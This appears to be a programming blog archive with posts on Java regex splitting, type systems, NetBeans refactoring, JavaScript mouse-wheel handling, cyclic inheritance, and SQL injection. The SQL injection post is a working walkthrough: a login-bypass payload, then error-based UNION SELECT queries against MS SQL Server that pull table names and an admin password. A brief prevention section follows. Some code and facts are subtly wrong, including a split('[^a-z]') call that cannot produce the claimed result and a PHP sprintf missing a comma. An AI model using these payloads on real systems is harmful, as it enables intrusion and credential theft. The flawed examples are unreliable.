Splitting Strings in Java Using Regular Expressions Instead of StringTokenizer

In this quick tutorial I am going to illustrate how you can split String values in Java using regular expressions instead of the StringTokenizer class. Assume you have a string of brand names (that used to be only fruits!) separated by commas:

String brands = "Orange,Apple,Blackberry";

and you want to split that string so that each brand is an item in an array of a string data type. Doing this using the StringTokenizer class would probably look something like this:

String brands = "Orange,Apple,Blackberry";
StringTokenizer tokenizer = new StringTokenizer(brands, ",");
String[] res = new String[tokenizer.countTokens()];

int i = 0;
while (tokenizer.hasMoreTokens()) {
     res[i] = tokenizer.nextToken();
     i++;
}

Despite being effective in this case, StringTokenizer is not always flexible and easy to use. For example, StringTokenizer can only handle one-character delimiters or group multiple delimiters as one; you cannot tell it to look for a particular word as a delimiter. Also, StringTokenizer cannot easily handle the possibility that two consecutive delimiters indicate a zero-length (empty) token. For example, assume we changed the input string to:

String brands = "Orange,Apple,,Blackberry";

If the “,,” is used to indicate a blank field, StringTokenizer becomes very difficult to use. For these reasons, and a lot others, StringTokenizer is considered obsolete and is not recommended to use. Instead, you should use regular expressions. Regular expressions, also called regex, are special text strings describing search patterns, the most frequently used regular expressions are:

Source: Introduction to Java Programming

There is a variety of ways to split strings using regular expressions. However, the most straightforward way is using the split() method located in the String class. The previous example can be re-written to this:

String brands = "Orange,Apple,Blackberry";
String[] res = brands.trim().split("[^a-z]");

The same result is reached with fewer lines of code. Not only that, the use of regular expressions permits the use of whole words as delimiters without any problems, as well as indicating zero-length tokens, if the input string is changed to:

String brands = "Orange,Apple,,Blackberry";

The third item in the array- index 2- will be a blank space, and “Blackberry” will be located at index 3.

Regular expressions, especially when combined with the split() method, Pattern, and Scanner classes, provide a very powerful and flexible alternative to StringTokenizer. The downside is that you have to learn and memorise regular expressions in order to use split()/Pattern/Scanner efficiently. However, regular expressions are very useful to learn, and they are used in many languages besides Java. For more information, you can check the Java tutorial on regular expressions as well as this website.

Hope this was useful, your comments and questions are always appreciated.

Share

Advertisements

Programming Type Systems

If you are a programmer who has worked with multiple programming languages, you must have noticed that while some languages, such as Java and C++, use almost similar methods to define their data types, while others, such as Python and Matlab, use completely different methods. This is because those two groups of languages use different type systems.

A type system is defined as tractable syntactic framework for classifying phrases according to the kinds of values they compute. It associates types with each computed value, and, by examining the flow of these values, attempts to prove that no type errors can occur. A type system generally seeks to guarantee that operations expecting a certain kind of value are not used with values for which that operation makes no sense.

Ok, in simpler words, a type system is a way for programming languages to classify values and expressions into types, how it can manipulate those types, and how they interact. Or, in even simpler terms, how data types are assigned to variables, and how they are handled. There are four type systems that programming languages can adopt. ANY programming language you know or have worked with, except two languages, belongs to at least two of the following categories:

Statistically-typed languages: languages in which data types are fixed at compile time, in other words, type checking (verification) is done when the code is compiled. Languages that use static typing include C++, Java, C#, and F#. These languages enforce this by requiring the programmer to explicitly declare all variables with their data types before use. An example of this is the floating point variables declaration in Java:

float f = 1.0f;

Static typing allows data type errors to be caught earlier in the development cycle. Besides verifying data types, static type checkers verify that the checked conditions hold for all possible executions of the program, which eliminates the need to repeat type checks every time the program is executed. Program execution may also be made more efficient by omitting runtime type checks. However, static typing can sometimes reduce code flexibility.

Dynamically-typed languages: languages in which the majority of its type checking is performed at run-time instead of checking at compile-time. Languages that use dynamic typing include JavaScript, PHP, Python, and Tcl. In dynamic typing, the values have types, not the variables; that is, a variable can refer to a value of any type. An example of this in Python:

x = 1
print x
x = "Hello, world!"
print x

This code would produce no errors and print “1” and “Hello, world!” By allowing programs to generate types and functionality based on run-time data, dynamic typing can be more flexible than static typing. However, dynamic typing may result in runtime type errors; at runtime, a value may have an unexpected type, and an operation nonsensical for that type is applied. Also, this operation could occur long after the place where the wrong type of data passed into a place it should not have, which makes the bug difficult to locate.

One thing to notice is that a dynamically-typed language is not necessarily a dynamic language. The term dynamic language means something different, but more on that later. (In a separate post, maybe? ;))

Strongly-typed languages: languages in which data types are always enforced. A data type cannot be treated like another unless it is explicitly converted. Strongly typed languages, such as C, Java, Pascal, and Python specify severe restrictions on how operations involving values having different data types can be intermixed, preventing the compiling or running of source code which uses data in what is considered to be an invalid way, e.g. the division of an inter over a string. To ensure they achieve their purpose, strongly-typed languages apply some or all of the following constraints:

  • The compiler must ensure that operations occur only on operand types that are valid for the operation.
  • An error must occurs as soon as a type-matching failure happens at runtime, or, as a special case of that with even stronger constraints, type-matching failures must never happen at runtime
  • Omitting implicit type conversions- conversions that are inserted by the compiler on the programmer’s behalf.
  • The type of a given data object does not vary over that object’s lifetime.
  • Type conversions are allowed only when an explicit notation, often called a cast, is used to indicate the desire of converting one type to another.
  • Disallowing any kind of type conversion. Values of one type cannot be converted to another type, explicitly or implicitly.

For example, an attempt to add an integer and a string in Python:

x = 1
y = "Hello, world!"
print x + y

will produce the error:

TypeError: unsupported operand type(s) for +: ‘int’ and ‘str’

Weakly-typed languages: languages in which types may be ignore. Weakly-typed languages support either implicit type conversion, ad-hoc polymorphism (overloading) or both. For example, adding an integer and a string in Matlab:

x = 1;
y = 'Hello, world!';
z = x + y

will not produce any error, actually it will produce the result:

z =    73   102   109   109   112    45    33   120   112   115   109   101    34

One last thing I want to talk about is type safety. Type safety can be defined as the use of a type system to prevent certain erroneous or undesirable program behaviour. This can be achieved statically, by catching potential errors at compile time, or dynamically, by associating type information with values at run time and consulting them as needed to detect imminent errors, or using combination of both. A programming language is called “type-safe” if it does not allow operations or conversions that lead to erroneous conditions, such as the previous Python example.

Remember when I said at the beginning of this post that all programming languages, adopt at least two of the four typing schemes, except two languages? Those two languages are the Assembly Language and Forth. Those two languages have been said to be untyped. There is no type checking. It is up to the programmer to ensure that data given to functions is of the appropriate type. Any type conversion required is explicit.

Share

Things That Not All Programmers Know #3: SQL Injection

Despite the fact that this a relatively old, and very famous security attack, many people I know do not know SQL injection or how it is performed. In this post, I am going to give a little introduction to SQL injection, some examples of how it is done and how to prevent it from becoming a threat to your Web site.

SQL injection- also known as SQL insertion- is a form of attack on a database-driven Web site, in which the attacker executes unauthorized SQL commands by exploiting a security vulnerability occurring in the database layer. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. This is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

More specifically, SQL injection is a trick to inject a SQL query or command as an input via Web pages that take parameters from Web user, such as a username and a password, and then make SQL query to the database to check the validity of these parameters, which will grant us something else.

It attacks on the web application, such as ASP, JSP, PHP, CGI, itself rather than on the web server or services running in the OS.

Testing the system’s vulnerability:

To successfully perform SQL injection, you have to first test if the system is vulnerable to such attack. You can do that by either looking for the “FORM” tag in the HTML source code of pages that allow you to submit data, such as login forms, where you may find something like this (a parameter that can be exploited):

<FORM action=“Search”/search.asp method=”POST”>
<input type=”hidden” name=“A” value=“C”>
</FORM>

Or by looking for ASP, JSP, PHP, or CGI Web pages, where the page URL takes parameters, like: http://duck/index.asp?id=10

Either way, you can test by attempting to log in by using the values or changing the URL parameter value to a’ or 1=1–. Example:

Username: a’ or 1=1–
Password: a’ or 1=1–
http://duck/index.asp?id= a’ or 1=1–

<FORM action=“Search”/search.asp method=”POST”>
<input type=”hidden” name=“A” value=“a’ or 1=1--”>
</FORM>

If the system is vulnerable, you will get login without any username or password.

Getting data from the database using error messages:

Error messages produced by Microsoft SQL Server can be exploited in order to get almost any desired data from the database. Take this page for example:

http://duck/index.asp?id=10

To get the name of the first table of the database, we can use the INFORMATION_SCHEMA.TABLES system table. This table contains information of all tables in the server and always exists. The TABLE_NAME field contains the name of each table in the database. So, what we are going to do here is UNION the parameter value ‘10’ with a query to get the first table name in the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1’ to a column of data type int.
/index.asp, line 5

The error tells you the value that cannot be converted to int, which in that case is the name of the first table. To get the next table name, you can use this query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

You can also use the LIKE keyword if you are looking for a specific table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

This will result in the following error:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin_login’ to a column of data type int.
/index.asp, line 5

‘%25login%25’ will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, “admin_login”.

Similarly, you can use the same method to obtain all column names from tables using the system table INFORMATION_SCHEMA.COLUMNS. For example, to get the first column name, use the query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Which will produce an error message from which you can get the name of the first column name. You can then use the NOT IN keywords as before to get the following column names.

After identifying the names of the database tables and columns, the same technique can be used again to get any information from the database. For example, assume you want to get the first username from the table “admin_login”, you can use the query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 username FROM admin_login—

The following error would result:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin’ to a column of data type int.
/index.asp, line 5

So you now know that there is a user with a username of “admin”. To get the password of that username from the database, use the query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where username='admin'--

The following error would result:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘p@ssword’ to a column of data type int.
/index.asp, line 5

Now you can log in to the system using the name “admin” and password “p@ssword”.

Preventing SQL injection:

To protect against SQL injection, two methods can be used, one is called Escaping, which filters out (escapes) character like single quote, double quote, slash, back slash, semi colon, extended characters like NULL, carriage return, new line, etc, in all strings from users’ input, URL parameters, and cookies’ values. For example, every occurrence of a single quote (‘) in a parameter must be replaced by two single quotes (”) to form a valid SQL string literal. This method is error-prone, however, as this is a type of blacklist, which has proved to be much less robust than whitelists. An example of escaping is using the function mysql_real_escape_string before sending the query in  PHP:

$query = sprintf("SELECT * FROM Users where UserName='%s' and Password='%s'"   mysql_real_escape_string($Username),
mysql_real_escape_string($Password));
mysql_query($query);

Another method is to use parameterized statements, which enables users’ input to be initially filtered instead of directly embedding it in the SQL statements. An example of parameterized statements is PerparedStatement in the Java JDBC API:

PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE USERNAME=? AND PASSWORD=?");
prep.setString(1, username);
prep.setString(2, password);
prep.executeQuery();

Another things that can be done to avoid SQL injection is to convert numeric values to integers before parsing them into the SQL statement. Or using ISNUMERIC to verify that they are integers.

And that’s it. Hope that was clear and simple enough. Your questions and comments are always welcomed.

Disclaimer: all of the information posted here is gathered from online published materials. None of this is my work and I am absolutely not responsible for any misuse of it. Modify/edit/use it at your own responsibility.

Share

NetBeans Refactoring – Part 2

Greetings my fellow programmers! Now that NetBeans 6.8 is released, I decided that this would be the best time to post part two of my NetBeans refactoring tutorial. I highly recommend reading part one before reading this post. Read it here.

The following Java class will be used to illustrate the refactoring techniques in this post:

public class FruitStand {
 int quantity;
 double pricePerUnit;
 double totalPrice = (pricePerUnit + 12.5) * quantity ;
 String[] merchandise = new String[100];

 public void insertIntoDB(String[] names) {
  for (int i = 0; i < names.length; i++)
   names[i] = names[i].toUpperCase();

  // Rest of method...
  }

 public class Apples {
  int quantity = 500;
  double pricePerUnit = 5.99;
 }
}

Some of the images here are not very clear because of page size limitations. You can click on any image to see it in full size.

Extract Interface:

Extract Interface refactoring allows you to select public non-static methods and move them into a separate interface. This can make your code more readable and maintainable. Suppose you want to extract the insertIntoDB method into an interface:

Note that the class FruitStand now implements NewInterface, and that NewInterface has appeared in the package:

Extract Superclass:

Extract Superclass refactoring works exactly the same way as Extract Interface refactoring. However Extract Superclass moves the methods to a new superclass and extends the refactored class (the one from which the methods were pulled). Repeating the same process we did in Extract Interface:

Move Inner to Outer Level:

Move Inner to Outer Level refactoring converts an inner class to a separate external class declared in its own file. It also gives you the option to declare a field for the current outer class. Here, I am going move the inner class Apples to a separate external class:

You can specify a new name for the class that is being moved and optionally, you can select to declare a field for the current outer class and enter a name for that field:

Note that the inner class Apples has disappeared from class FruitStand, and that a new class Apples has appeared in the package:

Introduce Constant:

Introduce Constant refactoring allows you to change a value used in your code into an individual constant. Assume that the owner of the fruit stand decided to deduct 12.5£ from each unit she sells (her business is not paying well!). So, the value of 12.5 will be declared as an individual constant by first highlighting it then choosing Introduce Constant:

You can also choose the name and the access modifier for the newly created constant:

And voila! The constant is declared and used in the statement where 12.5 was used:

Introduce Method:

Sometimes in your code, you notice that there are certain sections that contain similar blocks of code. Introduce Method refactoring can extracts these code fragments into a separate method that can be called anywhere. This makes the code more readable and easier to maintain. Assume that the fruits in the inventory are submitted into a database, but before doing so, their names must be written in upper case letters (it is stupid, I know!). The for loop inside the insertIntoDB method does that. You find out later that you need to do this operation again somewhere else in the code. Instead of writing it again, you can simply extract it into a separate method. To do this, highlight the code you want to convert to a method and choose Introduce Method:

As in Introduce Constant, you get to choose the method name and its access modifier:

And there you go! The method is declared and called where the piece of code was previously written:

Note that your code selections must meet the following criteria:

  • Selections cannot have more than one output parameter.
  • Selections cannot contain a break or continue statements if the corresponding target is not part of the selection.
  • Selections cannot contain a return statement that is not the last statement of the selection. The selected code is not allowed to return conditionally.

Encapsulate Fields:

When developing object-oriented code, it is almost a standard to give the fields (variables) private access, and use public methods to change their values or retrieve them- mutator (setter) and accessor (getter), respectively. Encapsulate Fields refactoring allows the automation of this process; it generates getter and setter methods for the desired fields, enabling the changing of the access modifier for those fields and the accessor methods. To illustrate this, I will encapsulate the quantity and pricePerUnit fields:

You can choose which fields to encapsulate and change the visibility modifiers of the fields and accessors:

After clicking Refactor, you will note that accessors and mutators of the chosen fields were added to your code:

And that is it. Hope you enjoyed this two-part tutorial. If you have any question or comment, do not hesitate to contact me or leave a comment here. See you later with another Significant Insignificane tutorial. Cheers!

Share

Things That Not All Programmers Know #2: Handling Mouse Wheel In JavaScript

Everyone who has been on the Web even a little knows the importance of the use of mouse wheels, scrolling pages, zooming in Google Maps, mouse wheel gestures in Opera 9 browser, and many more. It is almost impossible now to find a mouse without wheel. However, not many Web applications’ developers know how to make smart use of mouse wheel. Therefore, I decided to make this little tutorial to provide general information on how to handle mouse-wheel-generated events in JavaScript.

There are some images that are not very clear because of page size limitations. You can click on any image to see it in full size.

First, the thing you should know about mouse wheels is that they do not have an absolute system. Therefore, the only way to capture the wheel actions is via a parameter called delta, which is the mouse wheel angle changes. The delta parameter takes positive and negative values; if the wheel is scrolled up- which means the page is scrolled down- delta is positive, if the wheel is scrolled down- which mean the page is scrolled up- delta is negative. The handle function takes on that delta parameter. This function should be modified by you to handle the wheel actions:

High Level Function

The actual values of delta depend on the sensitivity of the mouse. However, for optimization, the code is adjusted so that the values of delta are either -1 or +1. Also note that delta takes different values between the Internet Explorer, Opera, and Mozilla Firefox browsers. For example, in Opera and Firefox, delta takes a different sign than that of Internet Explorer, and in Firefox, the value of delta is always a multiple of 3. Here is the event handler code:

Event Handler Function

The following part is optional. This piece of code is to prevent the default actions caused by the mouse wheel. You may want to do that because you are already handling scrolls somehow:

Handling Default Actions

The initialization code:

Initialization Code

And that is it. Now you can handle mouse wheel actions easily anyway you want using the handle function. Note that this code has been tested only with recent versions of Internet Explorer, Mozilla Firefox, Opera, and Safari browsers. I have no idea if it will work with other browsers or not.

Hope this was useful. I would really love it if you tried it and sent me your feedback. And again, if you know a good programming trick that you believe not many people know, please let me know. Wait for a new programming trick next month. Until then, happy coding!

Things That Not All Programmers Know #1: Cyclic Inheritance

It has been a month since launching Significant Insignificance last October. Before anything I would like to thank everyone who cared enough to visit my blog and read what may seem to others nothing but insignificant thoughts. I hope you enjoyed reading it as much as I enjoyed writing it and promise more of the same.

Today, I decided to add a new series to my blog: “Things That Not All Programmers Know”. To make sure that I always write technical posts, on the first day of every month, I am going to post something (a trick, a tip, a best practice) related to programming that I believe not many young programmers know. This way, everyone- including me- gets to learn something new.

I am going to start this series with something relatively easy: Cyclic Inheritance. First, the definition:

If a class or interface inherits from itself, even directly (i.e., it appears as its super-class or in its list of super-interfaces) or indirectly (i.e., one of its super-class or one of its super-interfaces inherits from it), a cyclic inheritance error is reported.

Ok, this needs an example, consider the following code:

When trying to compile it, you get the error: “cyclic inheritance involving Person“.

This is cyclic inheritance; each class inherits the other: Employee is the subclass of Person, and Person is the subclass of Employee. This relationship is not possible.

Cyclic inheritance can be solved by determining the proper relationship; that is, finding out the right super class and the subclass. In the previous example, Person is the super class, so it should not try to inherit Employee and Employee is the subclass which will inherit Person. Correction is removing “extends Employee” from the Person class signature:

Hope this was useful. If you know any unique programming trick (Java or others) that you believe not many people know, do not hesitate to contact me. And again, for everyone who followed my blog throughout the previous month, thanks a lot for your dedication. This blog would not be alive if it weren’t for your support. Thank you.

NetBeans Refactoring – Part 1

This week I decided to give you, my dear readers, a little rest from my blabbering and go technical a bit. I am going to talk about a very powerful and a personal favorite NetBeans feature: Refactoring.

If you do not know NetBeans, it is a free, cross-platform, open-source Integrated Development Environment (IDE) for software developers and a product of Sun Microsystems. An IDE is a software application that provides extensive facilities to programmers for software development, such as a source code editor, a compiler, an interpreter, build automation tools, and a debugger. For more information about NetBeans’ features, visit the official website.

Refactoring is about changing your source code easily. Imagine moving a class between packages and having to edit the package statements manually at the top of each file, or wanting delete a variable in the code and not knowing if it is referenced somewhere else in your application. Performing these types of operations manually can be time consuming and prone to error. However, with the advanced refactoring capability available in NetBeans, you can do such changes very easily. NetBeans provides many refactoring options on its Refactor menu. I am going illustrate half of them today and the other half in a following post.

EDIT: Part 2 is now available. Click here to read it.

For this post I have created two classes, ImportingClass and MoveClass. View them here and here.

There are some images that are not very clear because of page size limitations. You can click on any image to see it in full size.

Rename:

Rename refactoring allows you to change not only the name of the class but also any constructors, internal usages, and references to the renamed class by other classes. You can also rename the package, which will automatically rename all instances of the package name in your code, including comments. Here, I am going to change the name of the variable value to AddedValue in class ImportingClass:

Automatically, the variable name is also changed in class MoveClass:

Move:

Moving a class from one package to another may seem like an easy task; you just have to copy and paste the contents of the source file into the new directory and then edit the package statement at the top of the file then you are good to go. However, if other classes import or reference that class, then the developer must also search through and modify those files. Here is how you can move MoveClass from the refactoringpackage2 package to refactoringpackage1:

Copy:

Copy refactoring allows you to copy the contents of a class to another package, automatically changing the package statement at the top of the source file.

Safe Delete:

Sometimes when you are reviewing a previously written code, you decide to remove a class member variable that you think is not used, only to find out that it does indeed appear in your code, and then your class does not compile. With Safe Delete refactoring, you can identify each usage of a class, method, or field in code before deleting it. I am going to illustrate it by trying to delete the AddedValue variable from class ImportingClass:

However, the variable was referenced in class MoveClass, so deleting it would cause an error. T=NetBeans alerts you to that, and can even show you where the member you want to delete is referenced if you clicked the “Show Usages…” button:

Change Method Parameters:

Change Method Parameters allows you to safely change everything in a method header- access modifier and arguments- and notifies you if this change is going to affect your source file. Here, I am going to try to delete the parameter x of the display method of class ImportingClass:

Parameter x is used within the method body, and so a warning is displayed:

For the following examples, I created a class called Truck, which inherits fr0m a class called Vehicle. View here.

Pull Up:

When working with classes and superclasses, Pull Up refactoring is very useful. It allows you to move class members and methods from a subclass up into the superclass.

Push Down:

Push Down is the opposite of Pull Up refactoring. It pushes a superclass member down into a subclass.

And that’s it for this time, note that those are only half of the capabilities of NetBeans refactoring. I am going to go through the other half in a following post soon. If you have any question or comment, do not hesitate to contact me.

EDIT: Part 2 is now available. Click here to read it.

Share